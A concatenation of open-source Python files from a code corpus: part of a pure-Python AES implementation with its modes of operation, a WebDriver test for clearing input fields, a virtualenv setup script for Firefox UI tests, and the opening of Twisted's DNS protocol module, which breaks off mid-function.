U4 = [ 0x00000000, 0x090d0b0e, 0x121a161c, 0x1b171d12, 0x24342c38, 0x2d392736, 0x362e3a24, 0x3f23312a, 0x48685870, 0x4165537e, 0x5a724e6c, 0x537f4562, 0x6c5c7448, 0x65517f46, 0x7e466254, 0x774b695a, 0x90d0b0e0, 0x99ddbbee, 0x82caa6fc, 0x8bc7adf2, 0xb4e49cd8, 0xbde997d6, 0xa6fe8ac4, 0xaff381ca, 0xd8b8e890, 0xd1b5e39e, 0xcaa2fe8c, 0xc3aff582, 0xfc8cc4a8, 0xf581cfa6, 0xee96d2b4, 0xe79bd9ba, 0x3bbb7bdb, 0x32b670d5, 0x29a16dc7, 0x20ac66c9, 0x1f8f57e3, 0x16825ced, 0x0d9541ff, 0x04984af1, 0x73d323ab, 0x7ade28a5, 0x61c935b7, 0x68c43eb9, 0x57e70f93, 0x5eea049d, 0x45fd198f, 0x4cf01281, 0xab6bcb3b, 0xa266c035, 0xb971dd27, 0xb07cd629, 0x8f5fe703, 0x8652ec0d, 0x9d45f11f, 0x9448fa11, 0xe303934b, 0xea0e9845, 0xf1198557, 0xf8148e59, 0xc737bf73, 0xce3ab47d, 0xd52da96f, 0xdc20a261, 0x766df6ad, 0x7f60fda3, 0x6477e0b1, 0x6d7aebbf, 0x5259da95, 0x5b54d19b, 0x4043cc89, 0x494ec787, 0x3e05aedd, 0x3708a5d3, 0x2c1fb8c1, 0x2512b3cf, 0x1a3182e5, 0x133c89eb, 0x082b94f9, 0x01269ff7, 0xe6bd464d, 0xefb04d43, 0xf4a75051, 0xfdaa5b5f, 0xc2896a75, 0xcb84617b, 0xd0937c69, 0xd99e7767, 0xaed51e3d, 0xa7d81533, 0xbccf0821, 0xb5c2032f, 0x8ae13205, 0x83ec390b, 0x98fb2419, 0x91f62f17, 0x4dd68d76, 0x44db8678, 0x5fcc9b6a, 0x56c19064, 0x69e2a14e, 0x60efaa40, 0x7bf8b752, 0x72f5bc5c, 0x05bed506, 0x0cb3de08, 0x17a4c31a, 0x1ea9c814, 0x218af93e, 0x2887f230, 0x3390ef22, 0x3a9de42c, 0xdd063d96, 0xd40b3698, 0xcf1c2b8a, 0xc6112084, 0xf93211ae, 0xf03f1aa0, 0xeb2807b2, 0xe2250cbc, 0x956e65e6, 0x9c636ee8, 0x877473fa, 0x8e7978f4, 0xb15a49de, 0xb85742d0, 0xa3405fc2, 0xaa4d54cc, 0xecdaf741, 0xe5d7fc4f, 0xfec0e15d, 0xf7cdea53, 0xc8eedb79, 0xc1e3d077, 0xdaf4cd65, 0xd3f9c66b, 0xa4b2af31, 0xadbfa43f, 0xb6a8b92d, 0xbfa5b223, 0x80868309, 0x898b8807, 0x929c9515, 0x9b919e1b, 0x7c0a47a1, 0x75074caf, 0x6e1051bd, 0x671d5ab3, 0x583e6b99, 0x51336097, 0x4a247d85, 0x4329768b, 0x34621fd1, 0x3d6f14df, 0x267809cd, 0x2f7502c3, 0x105633e9, 0x195b38e7, 0x024c25f5, 0x0b412efb, 0xd7618c9a, 0xde6c8794, 0xc57b9a86, 0xcc769188, 0xf355a0a2, 0xfa58abac, 0xe14fb6be, 0xe842bdb0, 0x9f09d4ea, 0x9604dfe4, 0x8d13c2f6, 0x841ec9f8, 0xbb3df8d2, 0xb230f3dc, 0xa927eece, 0xa02ae5c0, 0x47b13c7a, 0x4ebc3774, 0x55ab2a66, 0x5ca62168, 0x63851042, 0x6a881b4c, 0x719f065e, 0x78920d50, 0x0fd9640a, 0x06d46f04, 0x1dc37216, 0x14ce7918, 0x2bed4832, 0x22e0433c, 0x39f75e2e, 0x30fa5520, 0x9ab701ec, 0x93ba0ae2, 0x88ad17f0, 0x81a01cfe, 0xbe832dd4, 0xb78e26da, 0xac993bc8, 0xa59430c6, 0xd2df599c, 0xdbd25292, 0xc0c54f80, 0xc9c8448e, 0xf6eb75a4, 0xffe67eaa, 0xe4f163b8, 0xedfc68b6, 0x0a67b10c, 0x036aba02, 0x187da710, 0x1170ac1e, 0x2e539d34, 0x275e963a, 0x3c498b28, 0x35448026, 0x420fe97c, 0x4b02e272, 0x5015ff60, 0x5918f46e, 0x663bc544, 0x6f36ce4a, 0x7421d358, 0x7d2cd856, 0xa10c7a37, 0xa8017139, 0xb3166c2b, 0xba1b6725, 0x8538560f, 0x8c355d01, 0x97224013, 0x9e2f4b1d, 0xe9642247, 0xe0692949, 0xfb7e345b, 0xf2733f55, 0xcd500e7f, 0xc45d0571, 0xdf4a1863, 0xd647136d, 0x31dccad7, 0x38d1c1d9, 0x23c6dccb, 0x2acbd7c5, 0x15e8e6ef, 0x1ce5ede1, 0x07f2f0f3, 0x0efffbfd, 0x79b492a7, 0x70b999a9, 0x6bae84bb, 0x62a38fb5, 0x5d80be9f, 0x548db591, 0x4f9aa883, 0x4697a38d ]
def __init__(self, key):
if len(key) not in (16, 24, 32):
raise ValueError('Invalid key size')
rounds = self.number_of_rounds[len(key)]
# Encryption round keys
self._Ke = [[0] * 4 for i in xrange(rounds + 1)]
# Decryption round keys
self._Kd = [[0] * 4 for i in xrange(rounds + 1)]
round_key_count = (rounds + 1) * 4
KC = len(key) // 4
# Convert the key into ints
tk = [ struct.unpack('>i', key[i:i + 4])[0] for i in xrange(0, len(key), 4) ]
# Copy values into round key arrays
for i in xrange(0, KC):
self._Ke[i // 4][i % 4] = tk[i]
self._Kd[rounds - (i // 4)][i % 4] = tk[i]
# Key expansion (fips-197 section 5.2)
rconpointer = 0
t = KC
while t < round_key_count:
tt = tk[KC - 1]
tk[0] ^= ((self.S[(tt >> 16) & 0xFF] << 24) ^
(self.S[(tt >> 8) & 0xFF] << 16) ^
(self.S[ tt & 0xFF] << 8) ^
self.S[(tt >> 24) & 0xFF] ^
(self.rcon[rconpointer] << 24))
rconpointer += 1
if KC != 8:
for i in xrange(1, KC):
tk[i] ^= tk[i - 1]
# Key expansion for 256-bit keys is "slightly different" (fips-197)
else:
for i in xrange(1, KC // 2):
tk[i] ^= tk[i - 1]
tt = tk[KC // 2 - 1]
tk[KC // 2] ^= (self.S[ tt & 0xFF] ^
(self.S[(tt >> 8) & 0xFF] << 8) ^
(self.S[(tt >> 16) & 0xFF] << 16) ^
(self.S[(tt >> 24) & 0xFF] << 24))
for i in xrange(KC // 2 + 1, KC):
tk[i] ^= tk[i - 1]
# Copy values into round key arrays
j = 0
while j < KC and t < round_key_count:
self._Ke[t // 4][t % 4] = tk[j]
self._Kd[rounds - (t // 4)][t % 4] = tk[j]
j += 1
t += 1
# Inverse-Cipher-ify the decryption round key (fips-197 section 5.3)
for r in xrange(1, rounds):
for j in xrange(0, 4):
tt = self._Kd[r][j]
self._Kd[r][j] = (self.U1[(tt >> 24) & 0xFF] ^
self.U2[(tt >> 16) & 0xFF] ^
self.U3[(tt >> 8) & 0xFF] ^
self.U4[ tt & 0xFF])
def encrypt(self, plaintext):
'Encrypt a block of plain text using the AES block cipher.'
if len(plaintext) != 16:
raise ValueError('wrong block length')
rounds = len(self._Ke) - 1
(s1, s2, s3) = [1, 2, 3]
a = [0, 0, 0, 0]
# Convert plaintext to (ints ^ key)
t = [(_compact_word(plaintext[4 * i:4 * i + 4]) ^ self._Ke[0][i]) for i in xrange(0, 4)]
# Apply round transforms
for r in xrange(1, rounds):
for i in xrange(0, 4):
a[i] = (self.T1[(t[ i ] >> 24) & 0xFF] ^
self.T2[(t[(i + s1) % 4] >> 16) & 0xFF] ^
self.T3[(t[(i + s2) % 4] >> 8) & 0xFF] ^
self.T4[ t[(i + s3) % 4] & 0xFF] ^
self._Ke[r][i])
t = copy.copy(a)
# The last round is special
result = [ ]
for i in xrange(0, 4):
tt = self._Ke[rounds][i]
result.append((self.S[(t[ i ] >> 24) & 0xFF] ^ (tt >> 24)) & 0xFF)
result.append((self.S[(t[(i + s1) % 4] >> 16) & 0xFF] ^ (tt >> 16)) & 0xFF)
result.append((self.S[(t[(i + s2) % 4] >> 8) & 0xFF] ^ (tt >> 8)) & 0xFF)
result.append((self.S[ t[(i + s3) % 4] & 0xFF] ^ tt ) & 0xFF)
return result
def decrypt(self, ciphertext):
'Decrypt a block of cipher text using the AES block cipher.'
if len(ciphertext) != 16:
raise ValueError('wrong block length')
rounds = len(self._Kd) - 1
(s1, s2, s3) = [3, 2, 1]
a = [0, 0, 0, 0]
# Convert ciphertext to (ints ^ key)
t = [(_compact_word(ciphertext[4 * i:4 * i + 4]) ^ self._Kd[0][i]) for i in xrange(0, 4)]
# Apply round transforms
for r in xrange(1, rounds):
for i in xrange(0, 4):
a[i] = (self.T5[(t[ i ] >> 24) & 0xFF] ^
self.T6[(t[(i + s1) % 4] >> 16) & 0xFF] ^
self.T7[(t[(i + s2) % 4] >> 8) & 0xFF] ^
self.T8[ t[(i + s3) % 4] & 0xFF] ^
self._Kd[r][i])
t = copy.copy(a)
# The last round is special
result = [ ]
for i in xrange(0, 4):
tt = self._Kd[rounds][i]
result.append((self.Si[(t[ i ] >> 24) & 0xFF] ^ (tt >> 24)) & 0xFF)
result.append((self.Si[(t[(i + s1) % 4] >> 16) & 0xFF] ^ (tt >> 16)) & 0xFF)
result.append((self.Si[(t[(i + s2) % 4] >> 8) & 0xFF] ^ (tt >> 8)) & 0xFF)
result.append((self.Si[ t[(i + s3) % 4] & 0xFF] ^ tt ) & 0xFF)
return result
class Counter(object):
'''A counter object for the Counter (CTR) mode of operation.
To create a custom counter, you can usually just override the
increment method.'''
def __init__(self, initial_value = 1):
# Convert the value into an array of bytes long
self._counter = [ ((initial_value >> i) % 256) for i in xrange(128 - 8, -1, -8) ]
value = property(lambda s: s._counter)
def increment(self):
'''Increment the counter (overflow rolls back to 0).'''
for i in xrange(len(self._counter) - 1, -1, -1):
self._counter[i] += 1
if self._counter[i] < 256: break
# Carry the one
self._counter[i] = 0
# Overflow
else:
self._counter = [ 0 ] * len(self._counter)
class AESBlockModeOfOperation(object):
'''Super-class for AES modes of operation that require blocks.'''
def __init__(self, key):
self._aes = AES(key)
def decrypt(self, ciphertext):
raise Exception('not implemented')
def encrypt(self, plaintext):
raise Exception('not implemented')
class AESStreamModeOfOperation(AESBlockModeOfOperation):
'''Super-class for AES modes of operation that are stream-ciphers.'''
class AESSegmentModeOfOperation(AESStreamModeOfOperation):
'''Super-class for AES modes of operation that segment data.'''
segment_bytes = 16
class AESModeOfOperationECB(AESBlockModeOfOperation):
'''AES Electronic Codebook Mode of Operation.
o Block-cipher, so data must be padded to 16 byte boundaries
Security Notes:
o This mode is not recommended
o Any two identical blocks produce identical encrypted values,
exposing data patterns. (See the image of Tux on wikipedia)
Also see:
o https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation#Electronic_codebook_.28ECB.29
o See NIST SP800-38A (http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf); section 6.1'''
name = "Electronic Codebook (ECB)"
def encrypt(self, plaintext):
if len(plaintext) != 16:
raise ValueError('plaintext block must be 16 bytes')
plaintext = _string_to_bytes(plaintext)
return _bytes_to_string(self._aes.encrypt(plaintext))
def decrypt(self, ciphertext):
if len(ciphertext) != 16:
raise ValueError('ciphertext block must be 16 bytes')
ciphertext = _string_to_bytes(ciphertext)
return _bytes_to_string(self._aes.decrypt(ciphertext))
class AESModeOfOperationCBC(AESBlockModeOfOperation):
'''AES Cipher-Block Chaining Mode of Operation.
o The Initialization Vector (IV)
o Block-cipher, so data must be padded to 16 byte boundaries
o An incorrect initialization vector will only cause the first
block to be corrupt; all other blocks will be intact
o A corrupt bit in the cipher text will cause a block to be
corrupted, and the next block to be inverted, but all other
blocks will be intact.
Security Notes:
o This method (and CTR) ARE recommended.
Also see:
o https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation#Cipher-block_chaining_.28CBC.29
o See NIST SP800-38A (http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf); section 6.2'''
name = "Cipher-Block Chaining (CBC)"
def __init__(self, key, iv = None):
if iv is None:
self._last_cipherblock = [ 0 ] * 16
elif len(iv) != 16:
raise ValueError('initialization vector must be 16 bytes')
else:
self._last_cipherblock = _string_to_bytes(iv)
AESBlockModeOfOperation.__init__(self, key)
def encrypt(self, plaintext):
if len(plaintext) != 16:
raise ValueError('plaintext block must be 16 bytes')
plaintext = _string_to_bytes(plaintext)
precipherblock = [ (p ^ l) for (p, l) in zip(plaintext, self._last_cipherblock) ]
self._last_cipherblock = self._aes.encrypt(precipherblock)
return _bytes_to_string(self._last_cipherblock)
def decrypt(self, ciphertext):
if len(ciphertext) != 16:
raise ValueError('ciphertext block must be 16 bytes')
cipherblock = _string_to_bytes(ciphertext)
plaintext = [ (p ^ l) for (p, l) in zip(self._aes.decrypt(cipherblock), self._last_cipherblock) ]
self._last_cipherblock = cipherblock
return _bytes_to_string(plaintext)
class AESModeOfOperationCFB(AESSegmentModeOfOperation):
'''AES Cipher Feedback Mode of Operation.
o A stream-cipher, so input does not need to be padded to blocks,
but does need to be padded to segment_size
Also see:
o https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation#Cipher_feedback_.28CFB.29
o See NIST SP800-38A (http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf); section 6.3'''
name = "Cipher Feedback (CFB)"
def __init__(self, key, iv, segment_size = 1):
if segment_size == 0: segment_size = 1
if iv is None:
self._shift_register = [ 0 ] * 16
elif len(iv) != 16:
raise ValueError('initialization vector must be 16 bytes')
else:
self._shift_register = _string_to_bytes(iv)
self._segment_bytes = segment_size
AESBlockModeOfOperation.__init__(self, key)
segment_bytes = property(lambda s: s._segment_bytes)
def encrypt(self, plaintext):
if len(plaintext) % self._segment_bytes != 0:
raise ValueError('plaintext block must be a multiple of segment_size')
plaintext = _string_to_bytes(plaintext)
# Break block into segments
encrypted = [ ]
for i in xrange(0, len(plaintext), self._segment_bytes):
plaintext_segment = plaintext[i: i + self._segment_bytes]
xor_segment = self._aes.encrypt(self._shift_register)[:len(plaintext_segment)]
cipher_segment = [ (p ^ x) for (p, x) in zip(plaintext_segment, xor_segment) ]
# Shift the top bits out and the ciphertext in
self._shift_register = _concat_list(self._shift_register[len(cipher_segment):], cipher_segment)
encrypted.extend(cipher_segment)
return _bytes_to_string(encrypted)
def decrypt(self, ciphertext):
if len(ciphertext) % self._segment_bytes != 0:
raise ValueError('ciphertext block must be a multiple of segment_size')
ciphertext = _string_to_bytes(ciphertext)
# Break block into segments
decrypted = [ ]
for i in xrange(0, len(ciphertext), self._segment_bytes):
cipher_segment = ciphertext[i: i + self._segment_bytes]
xor_segment = self._aes.encrypt(self._shift_register)[:len(cipher_segment)]
plaintext_segment = [ (p ^ x) for (p, x) in zip(cipher_segment, xor_segment) ]
# Shift the top bits out and the ciphertext in
self._shift_register = _concat_list(self._shift_register[len(cipher_segment):], cipher_segment)
decrypted.extend(plaintext_segment)
return _bytes_to_string(decrypted)
class AESModeOfOperationOFB(AESStreamModeOfOperation):
'''AES Output Feedback Mode of Operation.
o A stream-cipher, so input does not need to be padded to blocks,
allowing arbitrary length data.
o A bit twiddled in the cipher text, twiddles the same bit in the
same bit in the plain text, which can be useful for error
correction techniques.
Also see:
o https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation#Output_feedback_.28OFB.29
o See NIST SP800-38A (http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf); section 6.4'''
name = "Output Feedback (OFB)"
def __init__(self, key, iv = None):
if iv is None:
self._last_precipherblock = [ 0 ] * 16
elif len(iv) != 16:
raise ValueError('initialization vector must be 16 bytes')
else:
self._last_precipherblock = _string_to_bytes(iv)
self._remaining_block = [ ]
AESBlockModeOfOperation.__init__(self, key)
def encrypt(self, plaintext):
encrypted = [ ]
for p in _string_to_bytes(plaintext):
if len(self._remaining_block) == 0:
self._remaining_block = self._aes.encrypt(self._last_precipherblock)
self._last_precipherblock = [ ]
precipherbyte = self._remaining_block.pop(0)
self._last_precipherblock.append(precipherbyte)
cipherbyte = p ^ precipherbyte
encrypted.append(cipherbyte)
return _bytes_to_string(encrypted)
def decrypt(self, ciphertext):
# AES-OFB is symetric
return self.encrypt(ciphertext)
class AESModeOfOperationCTR(AESStreamModeOfOperation):
'''AES Counter Mode of Operation.
o A stream-cipher, so input does not need to be padded to blocks,
allowing arbitrary length data.
o The counter must be the same size as the key size (ie. len(key))
o Each block independant of the other, so a corrupt byte will not
damage future blocks.
o Each block has a uniue counter value associated with it, which
contributes to the encrypted value, so no data patterns are
leaked.
o Also known as: Counter Mode (CM), Integer Counter Mode (ICM) and
Segmented Integer Counter (SIC
Security Notes:
o This method (and CBC) ARE recommended.
o Each message block is associated with a counter value which must be
unique for ALL messages with the same key. Otherwise security may be
compromised.
Also see:
o https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation#Counter_.28CTR.29
o See NIST SP800-38A (http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf); section 6.5
and Appendix B for managing the initial counter'''
name = "Counter (CTR)"
def __init__(self, key, counter = None):
AESBlockModeOfOperation.__init__(self, key)
if counter is None:
counter = Counter()
self._counter = counter
self._remaining_counter = [ ]
def encrypt(self, plaintext):
while len(self._remaining_counter) < len(plaintext):
self._remaining_counter += self._aes.encrypt(self._counter.value)
self._counter.increment()
plaintext = _string_to_bytes(plaintext)
encrypted = [ (p ^ c) for (p, c) in zip(plaintext, self._remaining_counter) ]
self._remaining_counter = self._remaining_counter[len(encrypted):]
return _bytes_to_string(encrypted)
def decrypt(self, crypttext):
# AES-CTR is symetric
return self.encrypt(crypttext)
# Simple lookup table for each mode
AESModesOfOperation = dict(
ctr = AESModeOfOperationCTR,
cbc = AESModeOfOperationCBC,
cfb = AESModeOfOperationCFB,
ecb = AESModeOfOperationECB,
ofb = AESModeOfOperationOFB,
)
| gpl-2.0 |
stshine/servo | tests/wpt/web-platform-tests/old-tests/webdriver/user_input/clear_test.py | 142 | 2601 | # -*- mode: python; fill-column: 100; comment-column: 100; -*-
import os
import sys
import unittest
sys.path.insert(1, os.path.abspath(os.path.join(__file__, "../..")))
import base_test
from selenium.common import exceptions
class ElementClearTest(base_test.WebDriverBaseTest):
def test_writable_text_input_element_should_clear(self):
self.driver.get(self.webserver.where_is("user_input/res/element_clear_writable_input_page.html"))
e = self.driver.find_element_by_css_selector("#writableTextInput")
e.clear()
self.assertEquals("", e.get_attribute("value"))
def test_disabled_text_input_element_should_not_clear(self):
self.driver.get(self.webserver.where_is("user_input/res/element_clear_disabled_input_page.html"))
e = self.driver.find_element_by_css_selector("#disabledTextInput")
self.assertRaises(exceptions.InvalidElementStateException, lambda: e.clear())
def test_read_only_text_input_element_should_not_clear(self):
self.driver.get(self.webserver.where_is("user_input/res/element_clear_readonly_input_page.html"))
e = self.driver.find_element_by_css_selector("#readOnlyTextInput")
self.assertRaises(exceptions.InvalidElementStateException, lambda: e.clear())
def test_writable_text_area_element_should_clear(self):
self.driver.get(self.webserver.where_is("user_input/res/element_clear_writable_textarea_page.html"))
e = self.driver.find_element_by_css_selector("#writableTextArea")
e.clear()
self.assertEquals("", e.get_attribute("value"))
def test_disabled_text_area_element_should_not_clear(self):
self.driver.get(self.webserver.where_is("user_input/res/element_clear_disabled_textarea_page.html"))
e = self.driver.find_element_by_css_selector("#disabledTextArea")
self.assertRaises(exceptions.InvalidElementStateException, lambda: e.clear())
def test_read_only_text_input_element_should_not_clear(self):
self.driver.get(self.webserver.where_is("user_input/res/element_clear_readonly_textarea_page.html"))
e = self.driver.find_element_by_css_selector("#readOnlyTextArea")
self.assertRaises(exceptions.InvalidElementStateException, lambda: e.clear())
def test_content_editable_area_should_clear(self):
self.driver.get(self.webserver.where_is("user_input/res/element_clear_contenteditable_page.html"))
e = self.driver.find_element_by_css_selector("#contentEditableElement")
e.clear()
self.assertEquals("", e.text)
if __name__ == "__main__":
unittest.main()
| mpl-2.0 |
myrdd/firefox-ui-tests | create_venv.py | 2 | 3999 | #!/usr/bin/env python
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
"""
The script can be used to setup a virtual environment for running Firefox UI Tests.
It will automatically install the firefox ui test package, all its dependencies,
and optional packages if specified.
"""
import argparse
import os
import shutil
import subprocess
import sys
import urllib2
import zipfile
# Link to the folder, which contains the zip archives of virtualenv
VIRTUALENV_URL = 'https://github.com/pypa/virtualenv/archive/%(VERSION)s.zip'
VIRTUALENV_VERSION = '12.1.1'
here = os.path.dirname(os.path.abspath(__file__))
venv_script_path = 'Scripts' if sys.platform == 'win32' else 'bin'
venv_activate = os.path.join(venv_script_path, 'activate')
venv_activate_this = os.path.join(venv_script_path, 'activate_this.py')
venv_python_bin = os.path.join(venv_script_path, 'python')
usage_message = """
***********************************************************************
To run the Firefox UI Tests, activate the virtual environment:
{}{}
See firefox-ui-tests --help for all options
***********************************************************************
"""
def download(url, target):
"""Downloads the specified url to the given target."""
response = urllib2.urlopen(url)
with open(target, 'wb') as f:
f.write(response.read())
return target
def create_virtualenv(target, python_bin=None):
script_path = os.path.join(here, 'virtualenv-%s' % VIRTUALENV_VERSION,
'virtualenv.py')
print 'Downloading virtualenv %s' % VIRTUALENV_VERSION
zip_path = download(VIRTUALENV_URL % {'VERSION': VIRTUALENV_VERSION},
os.path.join(here, 'virtualenv.zip'))
try:
with zipfile.ZipFile(zip_path, 'r') as f:
f.extractall(here)
print 'Creating new virtual environment'
cmd_args = [sys.executable, script_path, target]
if python_bin:
cmd_args.extend(['-p', python_bin])
subprocess.check_call(cmd_args)
finally:
try:
os.remove(zip_path)
except OSError:
pass
shutil.rmtree(os.path.dirname(script_path), ignore_errors=True)
def main():
parser = argparse.ArgumentParser()
parser.add_argument('-p', '--python',
dest='python',
metavar='BINARY',
help='The Python interpreter to use.')
parser.add_argument('--with-optional-packages',
dest='with_optional',
default=False,
action='store_true',
help='Installs optional packages for enhanced usability.')
parser.add_argument('venv',
metavar='PATH',
help='Path to the environment to be created.')
args = parser.parse_args()
# Remove an already existent virtual environment
if os.path.exists(args.venv):
print 'Removing already existent virtual environment at: %s' % args.venv
shutil.rmtree(args.venv, True)
create_virtualenv(args.venv, python_bin=args.python)
# Activate the environment
tps_env = os.path.join(args.venv, venv_activate_this)
execfile(tps_env, dict(__file__=tps_env))
# Install Firefox UI tests, dependencies and optional packages
command = ['pip', 'install', os.getcwd()]
if args.with_optional:
command.extend(['-r', 'optional_packages.txt'])
print 'Installing Firefox UI Tests and dependencies...'
print 'Command: %s' % command
subprocess.check_call(command)
# Print the user instructions
print usage_message.format('' if sys.platform == 'win32' else 'source ',
os.path.join(args.venv, venv_activate))
if __name__ == "__main__":
main()
| mpl-2.0 |
Senseg/Py4A | python-modules/twisted/twisted/names/dns.py | 49 | 53596 | # -*- test-case-name: twisted.names.test.test_dns -*-
# Copyright (c) 2001-2010 Twisted Matrix Laboratories.
# See LICENSE for details.
"""
DNS protocol implementation.
Future Plans:
- Get rid of some toplevels, maybe.
@author: Moshe Zadka
@author: Jean-Paul Calderone
"""
__all__ = [
'IEncodable', 'IRecord',
'A', 'A6', 'AAAA', 'AFSDB', 'CNAME', 'DNAME', 'HINFO',
'MAILA', 'MAILB', 'MB', 'MD', 'MF', 'MG', 'MINFO', 'MR', 'MX',
'NAPTR', 'NS', 'NULL', 'PTR', 'RP', 'SOA', 'SPF', 'SRV', 'TXT', 'WKS',
'ANY', 'CH', 'CS', 'HS', 'IN',
'ALL_RECORDS', 'AXFR', 'IXFR',
'EFORMAT', 'ENAME', 'ENOTIMP', 'EREFUSED', 'ESERVER',
'Record_A', 'Record_A6', 'Record_AAAA', 'Record_AFSDB', 'Record_CNAME',
'Record_DNAME', 'Record_HINFO', 'Record_MB', 'Record_MD', 'Record_MF',
'Record_MG', 'Record_MINFO', 'Record_MR', 'Record_MX', 'Record_NAPTR',
'Record_NS', 'Record_NULL', 'Record_PTR', 'Record_RP', 'Record_SOA',
'Record_SPF', 'Record_SRV', 'Record_TXT', 'Record_WKS',
'QUERY_CLASSES', 'QUERY_TYPES', 'REV_CLASSES', 'REV_TYPES', 'EXT_QUERIES',
'Charstr', 'Message', 'Name', 'Query', 'RRHeader', 'SimpleRecord',
'DNSDatagramProtocol', 'DNSMixin', 'DNSProtocol',
'OK', 'OP_INVERSE', 'OP_NOTIFY', 'OP_QUERY', 'OP_STATUS', 'OP_UPDATE',
'PORT',
'AuthoritativeDomainError', 'DNSQueryTimeoutError', 'DomainError',
]
# System imports
import warnings
import struct, random, types, socket
try:
import cStringIO as StringIO
except ImportError:
import StringIO
AF_INET6 = socket.AF_INET6
from zope.interface import implements, Interface, Attribute
# Twisted imports
from twisted.internet import protocol, defer
from twisted.internet.error import CannotListenError
from twisted.python import log, failure
from twisted.python import util as tputil
from twisted.python import randbytes
def randomSource():
"""
Wrapper around L{randbytes.secureRandom} to return 2 random chars.
"""
return struct.unpack('H', randbytes.secureRandom(2, fallback=True))[0]
PORT = 53
(A, NS, MD, MF, CNAME, SOA, MB, MG, MR, NULL, WKS, PTR, HINFO, MINFO, MX, TXT,
RP, AFSDB) = range(1, 19)
AAAA = 28
SRV = 33
NAPTR = 35
A6 = 38
DNAME = 39
SPF = 99
QUERY_TYPES = {
A: 'A',
NS: 'NS',
MD: 'MD',
MF: 'MF',
CNAME: 'CNAME',
SOA: 'SOA',
MB: 'MB',
MG: 'MG',
MR: 'MR',
NULL: 'NULL',
WKS: 'WKS',
PTR: 'PTR',
HINFO: 'HINFO',
MINFO: 'MINFO',
MX: 'MX',
TXT: 'TXT',
RP: 'RP',
AFSDB: 'AFSDB',
# 19 through 27? Eh, I'll get to 'em.
AAAA: 'AAAA',
SRV: 'SRV',
NAPTR: 'NAPTR',
A6: 'A6',
DNAME: 'DNAME',
SPF: 'SPF'
}
IXFR, AXFR, MAILB, MAILA, ALL_RECORDS = range(251, 256)
# "Extended" queries (Hey, half of these are deprecated, good job)
EXT_QUERIES = {
IXFR: 'IXFR',
AXFR: 'AXFR',
MAILB: 'MAILB',
MAILA: 'MAILA',
ALL_RECORDS: 'ALL_RECORDS'
}
REV_TYPES = dict([
(v, k) for (k, v) in QUERY_TYPES.items() + EXT_QUERIES.items()
])
IN, CS, CH, HS = range(1, 5)
ANY = 255
QUERY_CLASSES = {
IN: 'IN',
CS: 'CS',
CH: 'CH',
HS: 'HS',
ANY: 'ANY'
}
REV_CLASSES = dict([
(v, k) for (k, v) in QUERY_CLASSES.items()
])
# Opcodes
OP_QUERY, OP_INVERSE, OP_STATUS = range(3)
OP_NOTIFY = 4 # RFC 1996
OP_UPDATE = 5 # RFC 2136
# Response Codes
OK, EFORMAT, ESERVER, ENAME, ENOTIMP, EREFUSED = range(6)
class IRecord(Interface):
"""
An single entry in a zone of authority.
"""
TYPE = Attribute("An indicator of what kind of record this is.")
# Backwards compatibility aliases - these should be deprecated or something I
# suppose. -exarkun
from twisted.names.error import DomainError, AuthoritativeDomainError
from twisted.names.error import DNSQueryTimeoutError
def str2time(s):
suffixes = (
('S', 1), ('M', 60), ('H', 60 * 60), ('D', 60 * 60 * 24),
('W', 60 * 60 * 24 * 7), ('Y', 60 * 60 * 24 * 365)
)
if isinstance(s, types.StringType):
s = s.upper().strip()
for (suff, mult) in suffixes:
if s.endswith(suff):
return int(float(s[:-1]) * mult)
try:
s = int(s)
except ValueError:
raise ValueError, "Invalid time interval specifier: " + s
return s
def readPrecisely(file, l):
buff = file.read(l)
if len(buff) < l:
raise EOFError
return buff
class IEncodable(Interface):
"""
Interface for something which can be encoded to and decoded
from a file object.
"""
def encode(strio, compDict = None):
"""
Write a representation of this object to the given
file object.
@type strio: File-like object
@param strio: The stream to which to write bytes
@type compDict: C{dict} or C{None}
@param compDict: A dictionary of backreference addresses that have
have already been written to this stream and that may be used for
compression.
"""
def decode(strio, length = None):
"""
Reconstruct an object from data read from the given
file object.
@type strio: File-like object
@param strio: The stream from which bytes may be read
@type length: C{int} or C{None}
@param length: The number of bytes in this RDATA field. Most
implementations can ignore this value. Only in the case of
records similar to TXT where the total length is in no way
encoded in the data is it necessary.
"""
class Charstr(object):
implements(IEncodable)
def __init__(self, string=''):
if not isinstance(string, str):
raise ValueError("%r is not a string" % (string,))
self.string = string
def encode(self, strio, compDict=None):
"""
Encode this Character string into the appropriate byte format.
@type strio: file
@param strio: The byte representation of this Charstr will be written
to this file.
"""
string = self.string
ind = len(string)
strio.write(chr(ind))
strio.write(string)
def decode(self, strio, length=None):
"""
Decode a byte string into this Name.
@type strio: file
@param strio: Bytes will be read from this file until the full string
is decoded.
@raise EOFError: Raised when there are not enough bytes available from
C{strio}.
"""
self.string = ''
l = ord(readPrecisely(strio, 1))
self.string = readPrecisely(strio, l)
def __eq__(self, other):
if isinstance(other, Charstr):
return self.string == other.string
return False
def __hash__(self):
return hash(self.string)
def __str__(self):
return self.string
class Name:
implements(IEncodable)
def __init__(self, name=''):
assert isinstance(name, types.StringTypes), "%r is not a string" % (name,)
self.name = name
def encode(self, strio, compDict=None):
"""
Encode this Name into the appropriate byte format.
@type strio: file
@param strio: The byte representation of this Name will be written to
this file.
@type compDict: dict
@param compDict: dictionary of Names that have already been encoded
and whose addresses may be backreferenced by this Name (for the purpose
of reducing the message size).
"""
name = self.name
while name:
if compDict is not None:
if name in compDict:
strio.write(
struct.pack("!H", 0xc000 | compDict[name]))
return
else:
compDict[name] = strio.tell() + Message.headerSize
ind = name.find('.')
if ind > 0:
label, name = name[:ind], name[ind + 1:]
else:
label, name = name, ''
ind = len(label)
strio.write(chr(ind))
strio.write(label)
strio.write(chr(0))
def decode(self, strio, length=None):
"""
Decode a byte string into this Name.
@type strio: file
@param strio: Bytes will be read from this file until the full Name
is decoded.
@raise EOFError: Raised when there are not enough bytes available
from C{strio}.
"""
self.name = ''
off = 0
